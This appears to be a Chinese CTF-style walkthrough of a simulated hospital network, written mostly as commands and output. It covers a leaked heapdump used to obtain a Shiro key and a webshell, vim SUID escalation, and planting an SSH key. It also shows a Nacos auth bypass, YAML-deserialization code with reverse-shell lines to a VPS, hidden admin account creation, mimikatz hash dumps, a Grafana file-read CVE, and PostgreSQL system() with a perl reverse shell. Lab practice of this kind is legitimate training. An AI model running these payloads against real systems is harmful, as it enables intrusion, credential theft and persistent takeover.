靶标介绍
在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个flag,分布于不同的靶机。
复现
39.98.119.102
flag1
nmap查看一下端口情况
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
shiro框架特征
http://39.98.119.102:8080/login;jsessionid=355D8AE7DBFE75DA739BE3950CFFC37C直接爆破密钥无果,猜测存在文件泄露
[08:51:39] 200 - 1KB - /actuator
[08:51:39] 200 - 20B - /actuator/caches
[08:51:39] 200 - 15B - /actuator/health
[08:51:39] 200 - 2B - /actuator/info
[08:51:39] 200 - 749B - /actuator/metrics
[08:51:39] 200 - 74KB - /actuator/beans
[08:51:40] 200 - 53KB - /actuator/loggers
[08:51:40] 200 - 54B - /actuator/scheduledtasks
[08:51:40] 200 - 93KB - /actuator/conditions
[08:51:40] 200 - 20KB - /actuator/mappings
[08:51:40] 200 - 8KB - /actuator/configprops
[08:51:40] 200 - 117KB - /actuator/threaddump存在heapdump泄露,下载之后用JDumpSpider-1.1-SNAPSHOT-full.jar利用
===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES
===========================================构造链:CommonsBeanutilsString 回显方式: TomcatEcho写入冰蝎内存马
路径:http://39.98.119.102:8080/11.ico
密码:1权限
\\/ >id
uid=1000(app) gid=1000(app) groups=1000(app)网络配置
\\/ >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.12.5 netmask 255.255.0.0 broadcast 172.30.255.255
inet6 fe80::216:3eff:fe18:5720 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:18:57:20 txqueuelen 1000 (Ethernet)
RX packets 103637 bytes 82658012 (82.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 67772 bytes 109773230 (109.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 992 bytes 86230 (86.2 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 992 bytes 86230 (86.2 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0/home/app/ >cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin
tcpdump:x:107:113::/nonexistent:/usr/sbin/nologin
ntp:x:108:115::/nonexistent:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
_chrony:x:110:121:Chrony daemon,,,:/var/lib/chrony:/usr/sbin/nologin
app:x:1000:1000::/home/app:/bin/bash
/home/app/ >ls -al /etc/passwd
-rw-r--r-- 1 root root 1643 Dec 15 2023 /etc/passwd提权root,find提权
/tmp/ >find / -user root -perm -4000 -print 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device存在vim有root权限,测试了一下,服务出网,先把shell反弹到VPS上,然后直接利用读取flag文件
vim /root/flag/flag01.txt
O)) O)) O)) O))
O)) O)) O) O)) O))
O)) O)) O)) O)))) O) O)) O)O) O) O)) O))
O)))))) O)) O)) O)) O)) O) O)) O)) O)) O)) O)) O))
O)) O))O)) O)) O))) O) O))O)) O)) O)) O)) O))
O)) O)) O)) O)) O))O)) O)) O)) O)) O)) O)) O))
O)) O)) O)) O)) O))O)) O)) O)) O)) O)))O)))
O))
flag01: flag{0a825299-1495-4293-bd0d-1c8e6b767dcb}利用vim的反弹shell提权到root
#payload
/usr/bin/vim.basic -c ':python3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'写入SSH公钥方便直接连接
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDrmqoCQun2fFTS3See9e+JEBUH0f5RPddj33czx9NRqeVdidrmkfJxdYaRjRS12P5sQC6b1S8C+EM6dyFgXSnXzrOtfpmZU+Fit5uHWKGyqlRuSbRD015cW9eQ+pM9EfVVXKADabj+Z5F5OGIPtSt/fjsOlZaELHXaLQZjQy5XNyPGgIPvjunRmYN6AYfCA8U2ocX24CLfP+LTbcLVorOzNHwFy5anEc77pAN7YaQLb/8zEt1Gt22DU5dXQ/kxgUl1APgMocmn/e0tConG/Ut/T7z9KwwNvmrc9bINVVTb0qd24Xvq9U15BQ/wREPGRrwmPMymFZQfg8ujNec5tg+Zqp4Bxo8nUex/Zqrd/Zeh1iah9KFKHgV/iqXfwLwCERmSj/6uoexY5HBY8kwgnNNTeotfzTs5Ai+hgqSxCIX99L+GuXDJZSISkCwvwxFsCD9Z4Hes7wnHPHq6MWUP9+Ql/yVjx3iO8GMYB9oueLJ/SeagBjuH7VaddF0GhRakogk=" > /root/.ssh/authorized_keys
flag2
上传fscan扫一下网段
./fscan -h 172.30.12.0/24[+] 端口开放 172.30.12.6:445
[+] 端口开放 172.30.12.6:139
[+] 端口开放 172.30.12.6:135
[+] 端口开放 172.30.12.236:22
[+] 端口开放 172.30.12.5:22
[+] 端口开放 172.30.12.236:8080
[+] 端口开放 172.30.12.5:8080
[+] 端口开放 172.30.12.236:8009
[+] 端口开放 172.30.12.6:8848
[*] NetInfo
[*] 172.30.12.6
[->] Server02
[->] 172.30.12.6
[*] NetBios 172.30.12.6 WORKGROUP\SERVER02
[*] 网站标题 http://172.30.12.5:8080 状态码:302 长度:0 标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=2D748EA59D57FA47CA88727F87CD871F
[*] 网站标题 http://172.30.12.5:8080/login;jsessionid=2D748EA59D57FA47CA88727F87CD871F 状态码:200 长度:2005 标题:医疗管理后台
[*] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964 标题:医院后台管理平台
[*] 网站标题 http://172.30.12.6:8848 状态码:404 长度:431 标题:HTTP Status 404 – Not Found
[+] [发现漏洞] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos
漏洞名称:
详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.30.12.6:8848
漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
漏洞名称:
详细信息: %!s(<nil>)
[+] [发现漏洞] 目标: http://172.30.12.5:8080
漏洞类型: poc-yaml-spring-actuator-heapdump-file
漏洞名称:
详细信息: %!s(<nil>)反弹shell搭建内网代理
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/bind_tcp
payload => linux/x64/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set rhost 39.98.119.102
rhost => 39.98.119.102
msf6 exploit(multi/handler) > set lport 53857
lport => 53857
msf6 exploit(multi/handler) > run
[*] Started bind TCP handler against 39.98.119.102:53857
[*] Sending stage (3020772 bytes) to 39.98.119.102
[*] Meterpreter session 1 opened (61.139.2.128:42249 -> 39.98.119.102:53857) at 2025-02-02 09:15:00 -0500路由信息
meterpreter > route
IPv4 network routes
===================
Subnet Netmask Gateway Metric Interface
------ ------- ------- ------ ---------
0.0.0.0 0.0.0.0 172.30.255.253 100 eth0
172.30.0.0 255.255.0.0 0.0.0.0 0 eth0
172.30.255.253 0.0.0.0 0.0.0.0 100 eth0添加路由搭建代理
meterpreter > run post/multi/manage/autoroute
[!] SESSION may not be compatible with this module:
[!] * incompatible session platform: linux
[*] Running module against 172.30.12.5
[*] Searching for subnets to autoroute.
[+] Route added to subnet 172.30.0.0/255.255.0.0 from host's routing table.访问8848端口有nacos服务,Alibaba Nacos权限认证绕过漏洞
http://172.30.12.6:8848
http://172.30.12.6:8848/nacos
http://172.30.12.6:8848/nacos/v1/auth/users?pageNo=1&pageSize=100
{"totalCount":1,"pageNumber":1,"pagesAvailable":1,"pageItems":[{"username":"nacos","password":"$2a$10$EuWPZHzz32dJN7jexM34MOeYirDdFAZm2kuWj7VEOJhhZkDrxfvUu"}]}
/nacos/v1/auth/users把GET请求改为POST,把修改User-Agent头改为Nacos-Server
POST /nacos/v1/auth/users HTTP/1.1
Host: 172.30.12.6:8848
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Nacos-Server
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 21
username=1&password=1
HTTP/1.1 200
Content-Type: application/json;charset=UTF-8
Date: Sun, 02 Feb 2025 14:25:50 GMT
Connection: close
Content-Length: 52
{"code":200,"message":"create user ok!","data":null}
1/1,成功登陆后台
server:
port: 8080
servlet:
context-path: /hello
spring:
application:
name: db-config
cloud:
nacos:
discovery:
server-addr: 127.0.0.1:8848
config:
server-addr: 127.0.0.1:8848
file-extension: yaml
namespace: dev
group: DEFAULT_GROUP
data-id: db-config.yaml
datasource:
mysql:
url: jdbc:mysql://localhost:3306/test?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
username: root
password: P@ssWord!!!
redis:
host: localhost
port: 6379
management:
endpoints:
web:
exposure:
include: '*'
msf不太稳定,换成venom了
#VPS
./admin_linux_x64 -rhost 39.98.109.61 -rport 1111
#边缘机
agent.exe -lport 1111考察的是yaml反序列化漏洞
#修改此文件,改成反弹shell之后再生成JAR文件
#AwesomeScriptEngineFactory.java
public AwesomeScriptEngineFactory() {
try {
// Runtime.getRuntime().exec("ping -c 4 `whoami`.xxx.dnslog.cn");
// Runtime.getRuntime().exec("calc");
// Runtime.getRuntime().exec("/bin/bash -i >& /dev/tcp/vps/9999 0>&1");
Runtime.getRuntime().exec("bash -i >& /dev/tcp/VPS/5000 0>&1");
} catch (IOException e) {
e.printStackTrace();
}
}该层内网机器不出网,先远程下载到边缘机再下载到该内网机,命令也需要改一下,反弹shell到vps肯定是行不通了,查看一下发现是windows机器,权限很高,直接add一个用户
Runtime.getRuntime().exec("net user gul gOOd@99881 /add");
Runtime.getRuntime().exec("net localgroup administrators gul /add");
连接远程RDP
172.30.12.6
gul
gOOd@99881得到flag
88 88 88 88
88 88 "" ,d 88
88 88 88 88
88aaaaaaaa88 ,adPPYba, ,adPPYba, 8b,dPPYba, 88 MM88MMM ,adPPYYba, 88
88""""""""88 a8" "8a I8[ "" 88P' "8a 88 88 "" `Y8 88
88 88 8b d8 `"Y8ba, 88 d8 88 88 ,adPPPPP88 88
88 88 "8a, ,a8" aa ]8I 88b, ,a8" 88 88, 88, ,88 88
88 88 `"YbbdP"' `"YbbdP"' 88`YbbdP"' 88 "Y888 `"8bbdP"Y8 88
88
88
flag02: flag{c7c5720f-437f-4371-aaf6-b269933757d2}
flag3
查看网络配置
#ipconfig
C:\Users\gul>ipconfig
Windows IP 配置
以太网适配器 以太网:
连接特定的 DNS 后缀 . . . . . . . :
本地链接 IPv6 地址. . . . . . . . : fe80::7b61:8389:41f5:b2c3%6
IPv4 地址 . . . . . . . . . . . . : 172.30.12.6
子网掩码 . . . . . . . . . . . . : 255.255.0.0
默认网关. . . . . . . . . . . . . : 172.30.255.253不是双网卡,考虑域
#ipconfig /all
C:\Users\gul>ipconfig /all
Windows IP 配置
主机名 . . . . . . . . . . . . . : Server02
主 DNS 后缀 . . . . . . . . . . . :
节点类型 . . . . . . . . . . . . : 混合
IP 路由已启用 . . . . . . . . . . : 否
WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 以太网:
连接特定的 DNS 后缀 . . . . . . . :
描述. . . . . . . . . . . . . . . : Red Hat VirtIO Ethernet Adapter
物理地址. . . . . . . . . . . . . : 00-16-3E-24-2A-A1
DHCP 已启用 . . . . . . . . . . . : 是
自动配置已启用. . . . . . . . . . : 是
本地链接 IPv6 地址. . . . . . . . : fe80::7b61:8389:41f5:b2c3%6(首选)
IPv4 地址 . . . . . . . . . . . . : 172.30.12.6(首选)
子网掩码 . . . . . . . . . . . . : 255.255.0.0
获得租约的时间 . . . . . . . . . : 2025年2月7日 17:50:07
租约过期的时间 . . . . . . . . . : 2035年2月5日 17:50:06
默认网关. . . . . . . . . . . . . : 172.30.255.253
DHCP 服务器 . . . . . . . . . . . : 172.30.255.253
DHCPv6 IAID . . . . . . . . . . . : 100668990
DHCPv6 客户端 DUID . . . . . . . : 00-01-00-01-2F-37-8F-A6-00-16-3E-24-2A-A1
DNS 服务器 . . . . . . . . . . . : 100.100.2.136
100.100.2.138
TCPIP 上的 NetBIOS . . . . . . . : 已启用mimikatz抓密码,结果如下
Using 'mimikatz.log' for logfile : OK
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords full
Authentication Id : 0 ; 10520639 (00000000:00a0883f)
Session : RemoteInteractive from 2
User Name : gul
Domain : Server02
Logon Server : Server02
Logon Time : 2025/2/7 18:56:25
SID : S-1-5-21-695727081-2069214537-2411057026-1000
msv :
[00000003] Primary
* Username : gul
* Domain : Server02
* NTLM : 49f773f2c9805b2539f28b823d080b6c
* SHA1 : 8ce9673aa15b4e5fedccaaae1bd2a5c3ed83ca8e
* DPAPI : 8ce9673aa15b4e5fedccaaae1bd2a5c3
tspkg :
wdigest :
* Username : gul
* Domain : Server02
* Password : (null)
kerberos :
* Username : gul
* Domain : Server02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10483240 (00000000:009ff628)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 18:56:23
SID : S-1-5-90-0-2
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 61204 (00000000:0000ef14)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 17:50:06
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : Server02$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-20
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : server02$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10520610 (00000000:00a08822)
Session : RemoteInteractive from 2
User Name : gul
Domain : Server02
Logon Server : Server02
Logon Time : 2025/2/7 18:56:25
SID : S-1-5-21-695727081-2069214537-2411057026-1000
msv :
[00000003] Primary
* Username : gul
* Domain : Server02
* NTLM : 49f773f2c9805b2539f28b823d080b6c
* SHA1 : 8ce9673aa15b4e5fedccaaae1bd2a5c3ed83ca8e
* DPAPI : 8ce9673aa15b4e5fedccaaae1bd2a5c3
tspkg :
wdigest :
* Username : gul
* Domain : Server02
* Password : (null)
kerberos :
* Username : gul
* Domain : Server02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 10483488 (00000000:009ff720)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 18:56:23
SID : S-1-5-90-0-2
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 10480827 (00000000:009fecbb)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/2/7 18:56:23
SID : S-1-5-96-0-2
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 86737 (00000000:000152d1)
Session : Batch from 0
User Name : Administrator
Domain : Server02
Logon Server : Server02
Logon Time : 2025/2/7 17:50:07
SID : S-1-5-21-695727081-2069214537-2411057026-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : Server02
* NTLM : eb1376a7d71ffa80d65deded1ff6570c
* SHA1 : 0139bb0227272402ddc81de9c8208446d2f3d087
* DPAPI : 0139bb0227272402ddc81de9c8208446
tspkg :
wdigest :
* Username : Administrator
* Domain : Server02
* Password : (null)
kerberos :
* Username : Administrator
* Domain : Server02
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2025/2/7 17:50:06
SID : S-1-5-19
msv :
tspkg :
wdigest :
* Username : (null)
* Domain : (null)
* Password : (null)
kerberos :
* Username : (null)
* Domain : (null)
* Password : (null)
ssp :
credman :
Authentication Id : 0 ; 61180 (00000000:0000eefc)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 2025/2/7 17:50:06
SID : S-1-5-90-0-1
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 31567 (00000000:00007b4f)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-96-0-1
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 31539 (00000000:00007b33)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-96-0-0
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
ssp :
credman :
Authentication Id : 0 ; 30513 (00000000:00007731)
Session : UndefinedLogonType from 0
User Name : (null)
Domain : (null)
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID :
msv :
tspkg :
wdigest :
kerberos :
ssp :
credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : Server02$
Domain : WORKGROUP
Logon Server : (null)
Logon Time : 2025/2/7 17:50:05
SID : S-1-5-18
msv :
tspkg :
wdigest :
* Username : Server02$
* Domain : WORKGROUP
* Password : (null)
kerberos :
* Username : server02$
* Domain : WORKGROUP
* Password : (null)
ssp :
credman :没啥东西,上边fscan扫的时候还有一个web服务
[*] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964 标题:医院后台管理平台java站点,fastjson
fastjson有一判断标志就是以json类型进行传参,当json数据未闭合或者语法错误时,会抛出异常,内容会含有fastjson字样
探测fastjson版本
{"@type": "java.lang.AutoCloseable"fastjson-version 1.2.45
fastjson 1.2.45可以打反序列化漏洞,DNS测试是否存在漏洞
{"qwq":{"@type":"java.net.Inet4Address","val":"pzts1f.dnslog.cn"}}
直接bp插件梭哈,写哥斯拉马
https://github.com/Maskhe/FastjsonScan
amaz1ngday/fastjson-exp: fastjson利用,支持tomcat、spring回显,哥斯拉内存马;回显利用链为dhcp、ibatis、c3p0。
/root/flag >cat f*
/$$ /$$ /$$ /$$ /$$
| $$ | $$ |__/ | $$ | $$
| $$ | $$ /$$$$$$ /$$$$$$$ /$$$$$$ /$$ /$$$$$$ /$$$$$$ | $$
| $$$$$$$$ /$$__ $$ /$$_____/ /$$__ $$| $$|_ $$_/ |____ $$| $$
| $$__ $$| $$ \ $$| $$$$$$ | $$ \ $$| $$ | $$ /$$$$$$$| $$
| $$ | $$| $$ | $$ \____ $$| $$ | $$| $$ | $$ /$$ /$$__ $$| $$
| $$ | $$| $$$$$$/ /$$$$$$$/| $$$$$$$/| $$ | $$$$/| $$$$$$$| $$
|__/ |__/ \______/ |_______/ | $$____/ |__/ \___/ \_______/|__/
| $$
| $$
|__/
flag03: flag{7d3b59e3-c0e1-4d33-bdd6-a467f8d235dc}flag4
查看网络情况,是双网卡,传fscan直接扫
/root/flag >ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.12.236 netmask 255.255.0.0 broadcast 172.30.255.255
inet6 fe80::216:3eff:fe24:29d2 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:24:29:d2 txqueuelen 1000 (Ethernet)
RX packets 89969 bytes 121717294 (121.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 22213 bytes 6563074 (6.5 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.30.54.179 netmask 255.255.255.0 broadcast 172.30.54.255
inet6 fe80::216:3eff:fe24:2917 prefixlen 64 scopeid 0x20<link>
ether 00:16:3e:24:29:17 txqueuelen 1000 (Ethernet)
RX packets 1081 bytes 45402 (45.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1099 bytes 46798 (46.7 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2875 bytes 244676 (244.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2875 bytes 244676 (244.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0./fscan -h 172.30.54.0/24
[+] 端口开放 172.30.54.12:5432
[+] 端口开放 172.30.54.12:3000
[+] 端口开放 172.30.54.179:8080
[+] 端口开放 172.30.54.12:22
[+] 端口开放 172.30.54.179:22
[+] 端口开放 172.30.54.179:8009
[*] 网站标题 http://172.30.54.12:3000 状态码:302 长度:29 标题:无标题 重定向地址: http://172.30.54.12:3000/login
[*] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909 标题:Grafana
[*] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964 标题:医院后台管理平台先搭建个内网代理,然后访问这个Grafana
弱口令admin/admin
- Grafana v8.3.0 (914fcedb7)
搜索历史漏洞,有个CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
直接用工具批量读取,获取敏感信息
直接上传到上一级的内网靶机来执行扫描
./grafanaExp_linux_amd64 exp -u "http://172.30.54.12:3000/"成功获取到PostgreSQL账密
postgres:Postgres@123连接172.30.54.12:5432数据库
#查看数据库版本
select version();
PostgreSQL 8.1.0 on x86_64-unknown-linux-gnu, compiled by GCC gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0
#修改root密码
ALTER USER root WITH PASSWORD '123456';
#创建命令执行函数
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
#perl反弹shell
select system('perl -e \'use Socket;$i="172.30.54.179";$p=5200;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');成功反弹shell
改成交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'需要提权
postgres@web04:/usr/local/pgsql/data$ sudo -l
sudo -l
Matching Defaults entries for postgres on web04:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on web04:
(ALL) NOPASSWD: /usr/local/postgresql/bin/psql有psql,打psql提权
#登入psql
sudo /usr/local/postgresql/bin/psqlpostgres@web04:/usr/local/pgsql/data$ sudo /usr/local/postgresql/bin/psql
sudo /usr/local/postgresql/bin/psql
Password: 123456
Welcome to psql 8.1.0, the PostgreSQL interactive terminal.
Type: \copyright for distribution terms
\h for help with SQL commands
\? for help with psql commands
\g or terminate with semicolon to execute query
\q to quit
root=# \? 【1】
\?
General
\c[onnect] [DBNAME|- [USER]]
connect to new database (currently "root")
\cd [DIR] change the current working directory
\copyright show PostgreSQL usage and distribution terms
\encoding [ENCODING]
show or set client encoding
\h [NAME] help on syntax of SQL commands, * for all commands
\q quit psql
\set [NAME [VALUE]]
set internal variable, or list all if no parameters
\timing toggle timing of commands (currently off)
\unset NAME unset (delete) internal variable
\! [COMMAND] execute command in shell or start interactive shell
Query Buffer
\e [FILE] edit the query buffer (or file) with external editor
\g [FILE] send query buffer to server (and results to file or |pipe)
\p show the contents of the query buffer
\r reset (clear) the query buffer
\w FILE write query buffer to file
Input/Output
--More--
\echo [STRING] write string to standard output
--More--
\i FILE execute commands from file
--More--
\o [FILE] send all query results to file or |pipe
--More--
\qecho [STRING]
--More--
write string to query output stream (see \o)
--More--
--More--
Informational
--More--
\d [NAME] describe table, index, sequence, or view
--More--
\d{t|i|s|v|S} [PATTERN] (add "+" for more detail)
--More--
list tables/indexes/sequences/views/system tables
--More--
\da [PATTERN] list aggregate functions
--More--
\db [PATTERN] list tablespaces (add "+" for more detail)
--More--
\dc [PATTERN] list conversions
--More--
\dC list casts
--More--
\dd [PATTERN] show comment for object
--More--
\dD [PATTERN] list domains
--More--
\df [PATTERN] list functions (add "+" for more detail)
--More--
\dg [PATTERN] list groups
--More--
\dn [PATTERN] list schemas (add "+" for more detail)
--More--
\do [NAME] list operators
--More--
\dl list large objects, same as \lo_list
--More--
\dp [PATTERN] list table, view, and sequence access privileges
--More--
\dT [PATTERN] list data types (add "+" for more detail)
--More--
\du [PATTERN] list users
--More--
\l list all databases (add "+" for more detail)
--More--
\z [PATTERN] list table, view, and sequence access privileges (same as \dp)
--More--
--More--
Formatting
--More--
\a toggle between unaligned and aligned output mode
--More--
\C [STRING] set table title, or unset if none
--More--
\f [STRING] show or set field separator for unaligned query output
--More--
\H toggle HTML output mode (currently off)
--More--!sh 【2】
!sh
# whoami 【3】
whoami
root
# ls
ls
base pg_hba.conf pg_subtrans PG_VERSION postmaster.opts
global pg_ident.conf pg_tblspc pg_xlog postmaster.pid
pg_clog pg_multixact pg_twophase postgresql.conf
# cd /root
cd /root
# ls
ls
flag
# cd flag
cd flag
# ls
ls
flag04.txt
# cat f*
cat f*
,, ,,
`7MMF' `7MMF' db mm `7MM
MM MM MM MM
MM MM ,pW"Wq. ,pP"Ybd `7MMpdMAo.`7MM mmMMmm ,6"Yb. MM
MMmmmmmmMM 6W' `Wb 8I `" MM `Wb MM MM 8) MM MM
MM MM 8M M8 `YMMMa. MM M8 MM MM ,pm9MM MM
MM MM YA. ,A9 L. I8 MM ,AP MM MM 8M MM MM
.JMML. .JMML.`Ybmd9' M9mmmP' MMbmmd' .JMML. `Mbmo`Moo9^Yo..JMML.
MM
.JMML.
flag04: flag{c87bef65-080d-4733-92a3-447b2d5d1eb2}得到flag
